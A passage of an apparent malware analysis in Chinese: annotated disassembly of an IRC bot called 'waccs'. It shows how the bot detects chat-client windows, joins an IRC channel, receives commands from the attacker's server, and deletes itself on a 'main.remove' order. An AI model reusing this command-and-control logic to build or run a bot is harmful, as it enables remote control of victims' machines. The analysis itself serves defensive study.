; ASCII "PuTTY" 004012EE 50 PUSH EAX 004012EF FF15 88814000 CALL DWORD PTR DS:[408188] ; USER32.FindWindowA 004012F5 85C0 TEST EAX,EAX 004012F7 74 0C JE SHORT waccs.00401305 004012F9 C785 0CFFFFFF 8>MOV DWORD PTR SS:[EBP-F4],waccs.00409080 00401303 EB 0A JMP SHORT waccs.0040130F 00401305 C785 0CFFFFFF B>MOV DWORD PTR SS:[EBP-F4],waccs.0040A0BC 0040130F 6A 00 PUSH 0 00401311 68 698783CA PUSH CA838769 00401316 8D4D 84 LEA ECX,DWORD PTR SS:[EBP-7C] 00401319 E8 58110000 CALL waccs.00402476 0040131E 50 PUSH EAX ; ASCII "TFrmMain" 0040131F FF15 88814000 CALL DWORD PTR DS:[408188] ; USER32.FindWindowA 00401325 85C0 TEST EAX,EAX 00401327 74 0C JE SHORT waccs.00401335 00401329 C785 08FFFFFF 9>MOV DWORD PTR SS:[EBP-F8],waccs.00409090 00401333 EB 0A JMP SHORT waccs.0040133F 00401335 C785 08FFFFFF C>MOV DWORD PTR SS:[EBP-F8],waccs.0040A0C0 0040133F 6A 00 PUSH 0 00401341 68 D452AC45 PUSH 45AC52D4 00401346 8D8D 74FFFFFF LEA ECX,DWORD PTR SS:[EBP-8C] 0040134C E8 C5100000 CALL waccs.00402416 00401351 50 PUSH EAX ; ASCII "YahooBuddyMain" 00401352 FF15 88814000 CALL DWORD PTR DS:[408188] ; USER32.FindWindowA 00401358 85C0 TEST EAX,EAX 0040135A 74 0C JE SHORT waccs.00401368 0040135C C785 04FFFFFF A>MOV DWORD PTR SS:[EBP-FC],waccs.004090A4 00401366 EB 0A JMP SHORT waccs.00401372 00401368 C785 04FFFFFF C>MOV DWORD PTR SS:[EBP-FC],waccs.0040A0C4 00401372 6A 00 PUSH 0 00401374 68 ED96D04C PUSH 4CD096ED 00401379 8D8D 64FFFFFF LEA ECX,DWORD PTR SS:[EBP-9C] 0040137F E8 32100000 CALL waccs.004023B6 00401384 50 PUSH EAX ; ASCII "MSBLWindowClass" 00401385 FF15 88814000 CALL DWORD PTR DS:[408188] ; USER32.FindWindowA 0040138B 85C0 TEST EAX,EAX 0040138D 74 0C JE SHORT waccs.0040139B 0040138F C785 00FFFFFF B>MOV DWORD PTR SS:[EBP-100],waccs.004090B> 00401399 EB 0A JMP SHORT waccs.004013A5 0040139B C785 00FFFFFF C>MOV DWORD PTR SS:[EBP-100],waccs.0040A0C> 004013A5 6A 00 PUSH 0 004013A7 68 64E255AD PUSH AD55E264 004013AC 8D8D 50FFFFFF LEA ECX,DWORD PTR SS:[EBP-B0] 004013B2 E8 9F0F0000 CALL waccs.00402356 004013B7 50 PUSH EAX ; ASCII "_Oscar_StatusNotify" 004013B8 FF15 88814000 CALL DWORD PTR DS:[408188] ; USER32.FindWindowA 004013BE 85C0 TEST EAX,EAX 004013C0 74 0C JE SHORT waccs.004013CE 004013C2 C785 FCFEFFFF D>MOV DWORD PTR SS:[EBP-104],waccs.004090D> 004013CC EB 0A JMP SHORT waccs.004013D8 004013CE C785 FCFEFFFF C>MOV DWORD PTR SS:[EBP-104],waccs.0040A0C> 004013D8 6A 00 PUSH 0 004013DA 68 B7B86706 PUSH 667B8B7 004013DF 8D8D 3CFFFFFF LEA ECX,DWORD PTR SS:[EBP-C4] 004013E5 E8 0C0F0000 CALL waccs.004022F6 004013EA 50 PUSH EAX ; ASCII "__oxFrame.class__" 004013EB FF15 88814000 CALL DWORD PTR DS:[408188] ; USER32.FindWindowA 004013F1 85C0 TEST EAX,EAX 004013F3 74 0C JE SHORT waccs.00401401 004013F5 C785 F8FEFFFF E>MOV DWORD PTR SS:[EBP-108],waccs.004090E> 004013FF EB 0A JMP SHORT waccs.0040140B 00401401 C785 F8FEFFFF D>MOV DWORD PTR SS:[EBP-108],waccs.0040A0D> 0040140B 8D45 E0 LEA EAX,DWORD PTR SS:[EBP-20] 0040140E 50 PUSH EAX 0040140F 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4] 00401412 50 PUSH EAX 00401413 FFB5 10FFFFFF PUSH DWORD PTR SS:[EBP-F0] 00401419 FFB5 0CFFFFFF PUSH DWORD PTR SS:[EBP-F4] 0040141F FFB5 08FFFFFF PUSH DWORD PTR SS:[EBP-F8] 00401425 FFB5 04FFFFFF PUSH DWORD PTR SS:[EBP-FC] 0040142B FFB5 00FFFFFF PUSH DWORD PTR SS:[EBP-100] 00401431 FFB5 FCFEFFFF PUSH DWORD PTR SS:[EBP-104] 00401437 FFB5 F8FEFFFF PUSH DWORD PTR SS:[EBP-108] 0040143D E8 6D270000 CALL waccs.00403BAF ; 排列数据. 00401442 50 PUSH EAX 00401443 68 D82E8AAE PUSH AE8A2ED8 00401448 8D8D 20FFFFFF LEA ECX,DWORD PTR SS:[EBP-E0] 0040144E E8 430E0000 CALL waccs.00402296 ; ASCII "\%0.2u%s%s%s%s%s%s%s\%3s\%s" 00401453 50 PUSH EAX 00401454 6A 1E PUSH 1E 00401456 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00401459 05 EC000000 ADD EAX,0EC 0040145E 50 PUSH EAX 0040145F E8 DC5B0000 CALL waccs.00407040 ; JMP 到 msvcrt._snprintf(ASCII "\00F\CHN\zsocxb7vm9"). 00401464 83C4 34 ADD ESP,34 00401467 8D8D 20FFFFFF LEA ECX,DWORD PTR SS:[EBP-E0] 0040146D E8 4C0A0000 CALL waccs.00401EBE ; 清除内存数据. 00401472 8D8D 3CFFFFFF LEA ECX,DWORD PTR SS:[EBP-C4] 00401478 E8 690A0000 CALL waccs.00401EE6 ; 清除内存数据. 0040147D 8D8D 50FFFFFF LEA ECX,DWORD PTR SS:[EBP-B0] 00401483 E8 860A0000 CALL waccs.00401F0E ; 清除内存数据. 00401488 8D8D 64FFFFFF LEA ECX,DWORD PTR SS:[EBP-9C] 0040148E E8 A30A0000 CALL waccs.00401F36 ; 清除内存数据. 00401493 8D8D 74FFFFFF LEA ECX,DWORD PTR SS:[EBP-8C] 00401499 E8 C00A0000 CALL waccs.00401F5E ; 清除内存数据. 0040149E 8D4D 84 LEA ECX,DWORD PTR SS:[EBP-7C] 004014A1 E8 200C0000 CALL waccs.004020C6 ; 清除内存数据. 004014A6 8D4D 90 LEA ECX,DWORD PTR SS:[EBP-70] 004014A9 E8 D80A0000 CALL waccs.00401F86 ; 清除内存数据. 004014AE 8D4D 98 LEA ECX,DWORD PTR SS:[EBP-68] 004014B1 E8 F80A0000 CALL waccs.00401FAE ; 清除内存数据. 004014B6 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 004014B9 05 EC000000 ADD EAX,0EC 004014BE 50 PUSH EAX 004014BF 68 2B298D3A PUSH 3A8D292B 004014C4 8D8D 14FFFFFF LEA ECX,DWORD PTR SS:[EBP-EC] 004014CA E8 C7100000 CALL waccs.00402596 ; ASCII "NICK %s" 004014CF 50 PUSH EAX 004014D0 FF75 08 PUSH DWORD PTR SS:[EBP+8] 004014D3 E8 28FBFFFF CALL waccs.00401000 ; 构造发送数据包(格式：NICK %s). 004014D8 83C4 0C ADD ESP,0C 004014DB 0FB6C0 MOVZX EAX,AL 004014DE F7D8 NEG EAX 004014E0 1BC0 SBB EAX,EAX 004014E2 40 INC EAX 004014E3 8885 1CFFFFFF MOV BYTE PTR SS:[EBP-E4],AL 004014E9 8D8D 14FFFFFF LEA ECX,DWORD PTR SS:[EBP-EC] 004014EF E8 E20A0000 CALL waccs.00401FD6 ; 清除内存数据. 004014F4 0FB685 1CFFFFFF MOVZX EAX,BYTE PTR SS:[EBP-E4] 004014FB 85C0 TEST EAX,EAX 004014FD 74 04 JE SHORT waccs.00401503 004014FF 32C0 XOR AL,AL 00401501 EB 02 JMP SHORT waccs.00401505 00401503 B0 01 MOV AL,1 00401505 5F POP EDI 00401506 5E POP ESI 00401507 C9 LEAVE 00401508 C3 RETN ; 返回. 接收从骇客服务器返回的数据包，根据包中骇客定义好的“指令”执行相应的恶意操作： 00401509 55 PUSH EBP 0040150A 8BEC MOV EBP,ESP 0040150C B8 14100000 MOV EAX,1014 00401511 E8 4A5B0000 CALL waccs.00407060 ; 初始化内存数据为空. 00401516 8D85 00F0FFFF LEA EAX,DWORD PTR SS:[EBP-1000] 0040151C 8985 FCEFFFFF MOV DWORD PTR SS:[EBP-1004],EAX 00401522 68 00100000 PUSH 1000 00401527 6A 00 PUSH 0 00401529 8D85 00F0FFFF LEA EAX,DWORD PTR SS:[EBP-1000] 0040152F 50 PUSH EAX 00401530 E8 055B0000 CALL waccs.0040703A ; JMP 到 msvcrt.memset 00401535 83C4 0C ADD ESP,0C 00401538 6A 00 PUSH 0 ; /Flags = 0 0040153A 68 00100000 PUSH 1000 ; \|BufSize = 1000 (4096.) 0040153F 8D85 00F0FFFF LEA EAX,DWORD PTR SS:[EBP-1000] 00401545 50 PUSH EAX ; \|Buffer = 0012E7C8 00401546 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00401549 FF30 PUSH DWORD PTR DS:[EAX] ; \|Socket = CC 0040154B FF15 E4814000 CALL DWORD PTR DS:[4081E4] ; WS2_32.recv(接收骇客远程服务器反回的数据指令包). 00401551 8985 F4EFFFFF MOV DWORD PTR SS:[EBP-100C],EAX 00401557 83BD F4EFFFFF 0>CMP DWORD PTR SS:[EBP-100C],0 0040155E 74 09 JE SHORT waccs.00401569 00401560 83BD F4EFFFFF F>CMP DWORD PTR SS:[EBP-100C],-1 00401567 75 0F JNZ SHORT waccs.00401578 00401569 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 0040156C FF30 PUSH DWORD PTR DS:[EAX] 0040156E FF15 C8814000 CALL DWORD PTR DS:[4081C8] ; WS2_32.closesocket(关闭连接). 00401574 32C0 XOR AL,AL 00401576 EB 6F JMP SHORT waccs.004015E7 00401578 68 44F2FD81 PUSH 81FDF244 0040157D 8D8D ECEFFFFF LEA ECX,DWORD PTR SS:[EBP-1014] 00401583 E8 6E100000 CALL waccs.004025F6 ; ASCII "\n" 00401588 50 PUSH EAX 00401589 FFB5 FCEFFFFF PUSH DWORD PTR SS:[EBP-1004] 0040158F E8 BE5A0000 CALL waccs.00407052 ; JMP 到 msvcrt.strstr 00401594 59 POP ECX 00401595 59 POP ECX 00401596 8985 F8EFFFFF MOV DWORD PTR SS:[EBP-1008],EAX 0040159C 8B85 F8EFFFFF MOV EAX,DWORD PTR SS:[EBP-1008] 004015A2 8985 F0EFFFFF MOV DWORD PTR SS:[EBP-1010],EAX 004015A8 8D8D ECEFFFFF LEA ECX,DWORD PTR SS:[EBP-1014] 004015AE E8 4B0A0000 CALL waccs.00401FFE ; 清除内存数据. 004015B3 83BD F0EFFFFF 0>CMP DWORD PTR SS:[EBP-1010],0 004015BA 74 29 JE SHORT waccs.004015E5 004015BC 8B85 F8EFFFFF MOV EAX,DWORD PTR SS:[EBP-1008] 004015C2 8020 00 AND BYTE PTR DS:[EAX],0 004015C5 FFB5 FCEFFFFF PUSH DWORD PTR SS:[EBP-1004] 004015CB FF75 08 PUSH DWORD PTR SS:[EBP+8] 004015CE E8 16000000 CALL waccs.004015E9 ; 解析从骇客服务器反回的数据包，根据包中骇客定义好的“指令”执行相应的恶意操作. 004015D3 59 POP ECX 004015D4 59 POP ECX 004015D5 8B85 F8EFFFFF MOV EAX,DWORD PTR SS:[EBP-1008] 004015DB 40 INC EAX 004015DC 40 INC EAX 004015DD 8985 FCEFFFFF MOV DWORD PTR SS:[EBP-1004],EAX 004015E3 ^ EB 93 JMP SHORT waccs.00401578 004015E5 B0 01 MOV AL,1 004015E7 C9 LEAVE 004015E8 C3 RETN ; 返回. 解析从骇客服务器反回的数据包，根据包中骇客定义好的“指令”执行相应的恶意操作(由于此函数内部代码过于烦琐，所以相应的省略了部分注解)： 004015E9 55 PUSH EBP 004015EA 8BEC MOV EBP,ESP 004015EC 81EC B40B0000 SUB ESP,0BB4 004015F2 57 PUSH EDI 004015F3 83A5 64FEFFFF 0>AND DWORD PTR SS:[EBP-19C],0 004015FA 6A 63 PUSH 63 004015FC 59 POP ECX 004015FD 33C0 XOR EAX,EAX 004015FF 8DBD 68FEFFFF LEA EDI,DWORD PTR SS:[EBP-198] 00401605 F3:AB REP STOS DWORD PTR ES:[EDI] 00401607 8365 F4 00 AND DWORD PTR SS:[EBP-C],0 0040160B 68 14914000 PUSH waccs.00409114 00401610 FF75 0C PUSH DWORD PTR SS:[EBP+C] 00401613 E8 3A5A0000 CALL waccs.00407052 ; JMP 到 msvcrt.strstr 00401618 59 POP ECX 00401619 59 POP ECX 0040161A 8945 F8 MOV DWORD PTR SS:[EBP-8],EAX 0040161D 837D F8 00 CMP DWORD PTR SS:[EBP-8],0 00401621 74 23 JE SHORT waccs.00401646 00401623 8B45 F8 MOV EAX,DWORD PTR SS:[EBP-8] 00401626 8020 00 AND BYTE PTR DS:[EAX],0 00401629 8B45 F4 MOV EAX,DWORD PTR SS:[EBP-C] 0040162C 8B4D 0C MOV ECX,DWORD PTR SS:[EBP+C] 0040162F 898C85 64FEFFFF MOV DWORD PTR SS:[EBP+EAX4-19C],ECX 00401636 8B45 F8 MOV EAX,DWORD PTR SS:[EBP-8] 00401639 40 INC EAX 0040163A 8945 0C MOV DWORD PTR SS:[EBP+C],EAX 0040163D 8B45 F4 MOV EAX,DWORD PTR SS:[EBP-C] 00401640 40 INC EAX 00401641 8945 F4 MOV DWORD PTR SS:[EBP-C],EAX 00401644 ^ EB C5 JMP SHORT waccs.0040160B 00401646 8B45 F4 MOV EAX,DWORD PTR SS:[EBP-C] 00401649 8B4D 0C MOV ECX,DWORD PTR SS:[EBP+C] 0040164C 898C85 64FEFFFF MOV DWORD PTR SS:[EBP+EAX4-19C],ECX 00401653 C745 FC 0400000>MOV DWORD PTR SS:[EBP-4],4 0040165A 83BD 64FEFFFF 0>CMP DWORD PTR SS:[EBP-19C],0 00401661 74 09 JE SHORT waccs.0040166C 00401663 83BD 68FEFFFF 0>CMP DWORD PTR SS:[EBP-198],0 0040166A 75 05 JNZ SHORT waccs.00401671 0040166C E9 22080000 JMP waccs.00401E93 00401671 FFB5 64FEFFFF PUSH DWORD PTR SS:[EBP-19C] 00401677 68 5D2573B7 PUSH B773255D 0040167C 8D8D 00F5FFFF LEA ECX,DWORD PTR SS:[EBP-B00] 00401682 E8 CF0F0000 CALL waccs.00402656 ; ASCII "PING" 00401687 50 PUSH EAX 00401688 E8 155A0000 CALL waccs.004070A2 ; JMP 到 msvcrt.strcmp(判断指令只否为"PING"). 0040168D 59 POP ECX 0040168E 59 POP ECX 0040168F F7D8 NEG EAX 00401691 1BC0 SBB EAX,EAX 00401693 40 INC EAX 00401694 8885 08F5FFFF MOV BYTE PTR SS:[EBP-AF8],AL 0040169A 8D8D 00F5FFFF LEA ECX,DWORD PTR SS:[EBP-B00] 004016A0 E8 81090000 CALL waccs.00402026 ; 清除内存数据. 004016A5 0FB685 08F5FFFF MOVZX EAX,BYTE PTR SS:[EBP-AF8] 004016AC 85C0 TEST EAX,EAX 004016AE 74 3F JE SHORT waccs.004016EF ; 判断是否该执行"PING"命令. 004016B0 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 004016B3 05 BA000000 ADD EAX,0BA 004016B8 50 PUSH EAX 004016B9 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 004016BC 05 A1000000 ADD EAX,0A1 004016C1 50 PUSH EAX 004016C2 FFB5 68FEFFFF PUSH DWORD PTR SS:[EBP-198] 004016C8 68 5BF5ABE4 PUSH E4ABF55B 004016CD 8D8D F8F4FFFF LEA ECX,DWORD PTR SS:[EBP-B08] 004016D3 E8 DE0F0000 CALL waccs.004026B6 ; ASCII "PONG %s" 004016D8 50 PUSH EAX 004016D9 FF75 08 PUSH DWORD PTR SS:[EBP+8] 004016DC E8 1FF9FFFF CALL waccs.00401000 ; 构造发送数据包(格式："PONG %s"). 004016E1 83C4 14 ADD ESP,14 004016E4 8D8D F8F4FFFF LEA ECX,DWORD PTR SS:[EBP-B08] 004016EA E8 E7080000 CALL waccs.00401FD6 ; 清除内存数据. 004016EF FFB5 68FEFFFF PUSH DWORD PTR SS:[EBP-198] 004016F5 68 1B2CF4BE PUSH BEF42C1B 004016FA 8D8D F0F4FFFF LEA ECX,DWORD PTR SS:[EBP-B10] 00401700 E8 11100000 CALL waccs.00402716 ; ASCII "001" 00401705 50 PUSH EAX 00401706 E8 97590000 CALL waccs.004070A2 ; JMP 到 msvcrt.strcmp(判断指令只否为"001"). 0040170B 59 POP ECX 0040170C 59 POP ECX 0040170D F7D8 NEG EAX 0040170F 1BC0 SBB EAX,EAX 00401711 40 INC EAX 00401712 8885 F4F4FFFF MOV BYTE PTR SS:[EBP-B0C],AL 00401718 8D8D F0F4FFFF LEA ECX,DWORD PTR SS:[EBP-B10] 0040171E E8 2B090000 CALL waccs.0040204E ; 清除内存数据. 00401723 0FB685 F4F4FFFF MOVZX EAX,BYTE PTR SS:[EBP-B0C] 0040172A 85C0 TEST EAX,EAX 0040172C 74 39 JE SHORT waccs.00401767 ; 判断是否该执行"001"命令. 0040172E 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00401731 05 BA000000 ADD EAX,0BA 00401736 50 PUSH EAX 00401737 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 0040173A 05 A1000000 ADD EAX,0A1 0040173F 50 PUSH EAX 00401740 68 CCADB02E PUSH 2EB0ADCC 00401745 8D8D E4F4FFFF LEA ECX,DWORD PTR SS:[EBP-B1C] 0040174B E8 26100000 CALL waccs.00402776 ; ASCII "JOIN %s %s". 00401750 50 PUSH EAX 00401751 FF75 08 PUSH DWORD PTR SS:[EBP+8] 00401754 E8 A7F8FFFF CALL waccs.00401000 ; 构造发送数据包(格式："JOIN %s %s"). 00401759 83C4 10 ADD ESP,10 0040175C 8D8D E4F4FFFF LEA ECX,DWORD PTR SS:[EBP-B1C] 00401762 E8 0F090000 CALL waccs.00402076 ; 清除内存数据. 00401767 FFB5 68FEFFFF PUSH DWORD PTR SS:[EBP-198] 0040176D 68 3B99B737 PUSH 37B7993B 00401772 8D8D D8F4FFFF LEA ECX,DWORD PTR SS:[EBP-B28] 00401778 E8 59100000 CALL waccs.004027D6 ; ASCII "KICK" 0040177D 50 PUSH EAX 0040177E E8 1F590000 CALL waccs.004070A2 ; JMP 到 msvcrt.strcmp(判断指令只否为"KICK"). 00401783 59 POP ECX 00401784 59 POP ECX 00401785 85C0 TEST EAX,EAX 00401787 75 64 JNZ SHORT waccs.004017ED 00401789 FFB5 6CFEFFFF PUSH DWORD PTR SS:[EBP-194] 0040178F 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00401792 05 A1000000 ADD EAX,0A1 00401797 50 PUSH EAX 00401798 E8 05590000 CALL waccs.004070A2 ; JMP 到 msvcrt.strcmp(近一步指令识别,判断指令只否为"##ghetto##"). 0040179D 59 POP ECX 0040179E 59 POP ECX 0040179F F7D8 NEG EAX 004017A1 1BC0 SBB EAX,EAX 004017A3 40 INC EAX 004017A4 8885 D4F4FFFF MOV BYTE PTR SS:[EBP-B2C],AL 004017AA 0FB685 D4F4FFFF MOVZX EAX,BYTE PTR SS:[EBP-B2C] 004017B1 85C0 TEST EAX,EAX 004017B3 74 38 JE SHORT waccs.004017ED 004017B5 FFB5 70FEFFFF PUSH DWORD PTR SS:[EBP-190] 004017BB 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 004017BE 05 EC000000 ADD EAX,0EC 004017C3 50 PUSH EAX 004017C4 E8 D9580000 CALL waccs.004070A2 ; JMP 到 msvcrt.strcmp(近一步指令识别). 004017C9 59 POP ECX 004017CA 59 POP ECX 004017CB F7D8 NEG EAX 004017CD 1BC0 SBB EAX,EAX 004017CF 40 INC EAX 004017D0 8885 D0F4FFFF MOV BYTE PTR SS:[EBP-B30],AL 004017D6 0FB685 D0F4FFFF MOVZX EAX,BYTE PTR SS:[EBP-B30] 004017DD 85C0 TEST EAX,EAX 004017DF 74 0C JE SHORT waccs.004017ED 004017E1 C785 50F4FFFF 0>MOV DWORD PTR SS:[EBP-BB0],1 004017EB EB 07 JMP SHORT waccs.004017F4 004017ED 83A5 50F4FFFF 0>AND DWORD PTR SS:[EBP-BB0],0 004017F4 8A85 50F4FFFF MOV AL,BYTE PTR SS:[EBP-BB0] 004017FA 8885 E0F4FFFF MOV BYTE PTR SS:[EBP-B20],AL 00401800 8D8D D8F4FFFF LEA ECX,DWORD PTR SS:[EBP-B28] 00401806 E8 1B080000 CALL waccs.00402026 ; 清除内存数据. 0040180B 0FB685 E0F4FFFF MOVZX EAX,BYTE PTR SS:[EBP-B20] 00401812 85C0 TEST EAX,EAX 00401814 74 39 JE SHORT waccs.0040184F ; 判断是否该执行"KICK"命令. 00401816 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00401819 05 BA000000 ADD EAX,0BA 0040181E 50 PUSH EAX 0040181F 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00401822 05 A1000000 ADD EAX,0A1 00401827 50 PUSH EAX 00401828 68 8CA52F28 PUSH 282FA58C 0040182D 8D8D C4F4FFFF LEA ECX,DWORD PTR SS:[EBP-B3C] 00401833 E8 FE0F0000 CALL waccs.00402836 ; ASCII "JOIN %s %s" 00401838 50 PUSH EAX 00401839 FF75 08 PUSH DWORD PTR SS:[EBP+8] 0040183C E8 BFF7FFFF CALL waccs.00401000 ; 构造发送数据包. 00401841 83C4 10 ADD ESP,10 00401844 8D8D C4F4FFFF LEA ECX,DWORD PTR SS:[EBP-B3C] 0040184A E8 27080000 CALL waccs.00402076 ; 清除内存数据. 0040184F FFB5 68FEFFFF PUSH DWORD PTR SS:[EBP-198] 00401855 68 4C914000 PUSH waccs.0040914C ; ASCII "332" 0040185A E8 43580000 CALL waccs.004070A2 ; JMP 到 msvcrt.strcmp(判断指令只否为"332"). 0040185F 59 POP ECX 00401860 59 POP ECX 00401861 85C0 TEST EAX,EAX 00401863 75 0C JNZ SHORT waccs.00401871 ; 判断是否该执行"332"命令. 00401865 C745 FC 0500000>MOV DWORD PTR SS:[EBP-4],5 0040186C E9 9C000000 JMP waccs.0040190D 00401871 FFB5 68FEFFFF PUSH DWORD PTR SS:[EBP-198] 00401877 68 3F38E862 PUSH 62E8383F 0040187C 8D8D B8F4FFFF LEA ECX,DWORD PTR SS:[EBP-B48] 00401882 E8 0F100000 CALL waccs.00402896 ; ASCII "PRIVMSG" 00401887 50 PUSH EAX 00401888 E8 15580000 CALL waccs.004070A2 ; JMP 到 msvcrt.strcmp(判断指令只否为"PRIVMSG"). 0040188D 59 POP ECX 0040188E 59 POP ECX 0040188F 85C0 TEST EAX,EAX 00401891 74 4C JE SHORT waccs.004018DF ; 判断是否该执行"PRIVMSG"命令. 00401893 FFB5 68FEFFFF PUSH DWORD PTR SS:[EBP-198] 00401899 68 3FCE37DE PUSH DE37CE3F 0040189E 8D8D B0F4FFFF LEA ECX,DWORD PTR SS:[EBP-B50] 004018A4 E8 4D100000 CALL waccs.004028F6 ; ASCII "332" 004018A9 50 PUSH EAX 004018AA E8 F3570000 CALL waccs.004070A2 ; JMP 到 msvcrt.strcmp(判断指令只否为"332"). 004018AF 59 POP ECX 004018B0 59 POP ECX 004018B1 F7D8 NEG EAX 004018B3 1BC0 SBB EAX,EAX 004018B5 F7D8 NEG EAX 004018B7 8885 B4F4FFFF MOV BYTE PTR SS:[EBP-B4C],AL 004018BD 8D8D B0F4FFFF LEA ECX,DWORD PTR SS:[EBP-B50] 004018C3 E8 86070000 CALL waccs.0040204E ; 清除内存数据. 004018C8 0FB685 B4F4FFFF MOVZX EAX,BYTE PTR SS:[EBP-B4C] 004018CF 85C0 TEST EAX,EAX 004018D1 74 0C JE SHORT waccs.004018DF ; 判断是否该执行"332"命令. 004018D3 C785 4CF4FFFF 0>MOV DWORD PTR SS:[EBP-BB4],1 004018DD EB 07 JMP SHORT waccs.004018E6 004018DF 83A5 4CF4FFFF 0>AND DWORD PTR SS:[EBP-BB4],0 004018E6 8A85 4CF4FFFF MOV AL,BYTE PTR SS:[EBP-BB4] 004018EC 8885 C0F4FFFF MOV BYTE PTR SS:[EBP-B40],AL 004018F2 8D8D B8F4FFFF LEA ECX,DWORD PTR SS:[EBP-B48] 004018F8 E8 D9060000 CALL waccs.00401FD6 ; 清除内存数据. 004018FD 0FB685 C0F4FFFF MOVZX EAX,BYTE PTR SS:[EBP-B40] 00401904 85C0 TEST EAX,EAX 00401906 74 05 JE SHORT waccs.0040190D 00401908 E9 86050000 JMP waccs.00401E93 ; 返回(退出)该函数. 0040190D 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401910 8B8485 60FEFFFF MOV EAX,DWORD PTR SS:[EBP+EAX4-1A0] 00401917 8B4D FC MOV ECX,DWORD PTR SS:[EBP-4] 0040191A 8B8C8D 60FEFFFF MOV ECX,DWORD PTR SS:[EBP+ECX4-1A0] 00401921 41 INC ECX 00401922 8B55 FC MOV EDX,DWORD PTR SS:[EBP-4] 00401925 898C95 60FEFFFF MOV DWORD PTR SS:[EBP+EDX4-1A0],ECX 0040192C 85C0 TEST EAX,EAX 0040192E 74 0D JE SHORT waccs.0040193D 00401930 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401933 83BC85 64FEFFFF>CMP DWORD PTR SS:[EBP+EAX4-19C],0 0040193B 75 05 JNZ SHORT waccs.00401942 0040193D E9 51050000 JMP waccs.00401E93 ; 返回(退出)该函数. 00401942 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00401945 05 EC000000 ADD EAX,0EC 0040194A 50 PUSH EAX 0040194B 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 0040194E FFB485 60FEFFFF PUSH DWORD PTR SS:[EBP+EAX4-1A0] 00401955 E8 61250000 CALL waccs.00403EBB ; 数据处理. 0040195A 59 POP ECX 0040195B 59 POP ECX 0040195C 85C0 TEST EAX,EAX 0040195E 74 05 JE SHORT waccs.00401965 00401960 E9 2E050000 JMP waccs.00401E93 ; 返回(退出)该函数. 00401965 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401968 FFB485 64FEFFFF PUSH DWORD PTR SS:[EBP+EAX4-19C] 0040196F 68 DD341F7F PUSH 7F1F34DD 00401974 8D8D A0F4FFFF LEA ECX,DWORD PTR SS:[EBP-B60] 0040197A E8 D70F0000 CALL waccs.00402956 ; ASCII "main.remove" 0040197F 50 PUSH EAX 00401980 E8 1D570000 CALL waccs.004070A2 ; JMP 到 msvcrt.strcmp(判断指令只否为"main.remove"). 00401985 59 POP ECX 00401986 59 POP ECX 00401987 F7D8 NEG EAX 00401989 1BC0 SBB EAX,EAX 0040198B 40 INC EAX 0040198C 8885 ACF4FFFF MOV BYTE PTR SS:[EBP-B54],AL 00401992 8D8D A0F4FFFF LEA ECX,DWORD PTR SS:[EBP-B60] 00401998 E8 01070000 CALL waccs.0040209E ; 清除内存数据. 0040199D 0FB685 ACF4FFFF MOVZX EAX,BYTE PTR SS:[EBP-B54] 004019A4 85C0 TEST EAX,EAX 004019A6 74 4A JE SHORT waccs.004019F2 ; 判断是否该执行"main.remove"命令. 004019A8 68 34BB33D5 PUSH D533BB34 004019AD 8D8D 90F4FFFF LEA ECX,DWORD PTR SS:[EBP-B70] 004019B3 E8 FE0F0000 CALL waccs.004029B6 ; ASCII "QUIT :Removing" 004019B8 50 PUSH EAX 004019B9 FF75 08 PUSH DWORD PTR SS:[EBP+8] 004019BC E8 3FF6FFFF CALL waccs.00401000 ; 构造发送数据包. 004019C1 59 POP ECX 004019C2 59 POP ECX 004019C3 8D8D 90F4FFFF LEA ECX,DWORD PTR SS:[EBP-B70] 004019C9 E8 90050000 CALL waccs.00401F5E ; 清除内存数据. 004019CE FF15 E8814000 CALL DWORD PTR DS:[4081E8] ; WS2_32.WSACleanup(清除WinSock库函数). 004019D4 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 004019D7 FFB0 0C010000 PUSH DWORD PTR DS:[EAX+10C] 004019DD FF15 74804000 CALL DWORD PTR DS:[408074] ; kernel32.ReleaseMutex(释放由线程拥有的一个互斥体). 004019E3 6A 00 PUSH 0 004019E5 E8 86270000 CALL waccs.00404170 ; 删除病毒在注册表中的启动项. 004019EA 59 POP ECX 004019EB E8 1D260000 CALL waccs.0040400D ; 主病毒体程序文件执行自我删除. 004019F0 EB 60 JMP SHORT waccs.00401A52 004019F2 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 004019F5 FFB485 64FEFFFF PUSH DWORD PTR SS:[EBP+EAX4-19C] 004019FC 68 843DBF83 PUSH 83BF3D84 00401A01 8D8D 80F4FFFF LEA ECX,DWORD PTR SS:[EBP-B80] 00401A07 E8 0A100000 CALL waccs.00402A16 ; ASCII "msn.stop" 00401A0C 50 PUSH EAX 00401A0D E8 90560000 CALL waccs.004070A2 ; JMP 到 msvcrt.strcmp(判断指令只否为"msn.stop"). 00401A12 59 POP ECX 00401A13 59 POP ECX 00401A14 F7D8 NEG EAX 00401A16 1BC0 SBB EAX,EAX 00401A18 40 INC EAX 00401A19 8885 8CF4FFFF MOV BYTE PTR SS:[EBP-B74],AL 00401A1F 8D8D 80F4FFFF LEA ECX,DWORD PTR SS:[EBP-B80] 00401A25 E8 9C060000 CALL waccs.004020C6 ; 清除内存数据. 00401A2A 0FB685 8CF4FFFF MOVZX EAX,BYTE PTR SS:[EBP-B74] 00401A31 85C0 TEST EAX,EAX 00401A33 74 1D JE SHORT waccs.00401A52 ; 判断. 00401A35 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00401A38 83B8 10010000 0>CMP DWORD PTR DS:[EAX+110],0 00401A3F 74 11 JE SHORT waccs.00401A52 ; 判断. 